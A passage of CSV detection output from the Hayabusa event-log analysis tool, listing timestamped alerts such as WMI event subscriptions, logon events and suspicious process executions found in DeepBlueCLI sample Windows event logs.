Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:28.619 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:10:53.299 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 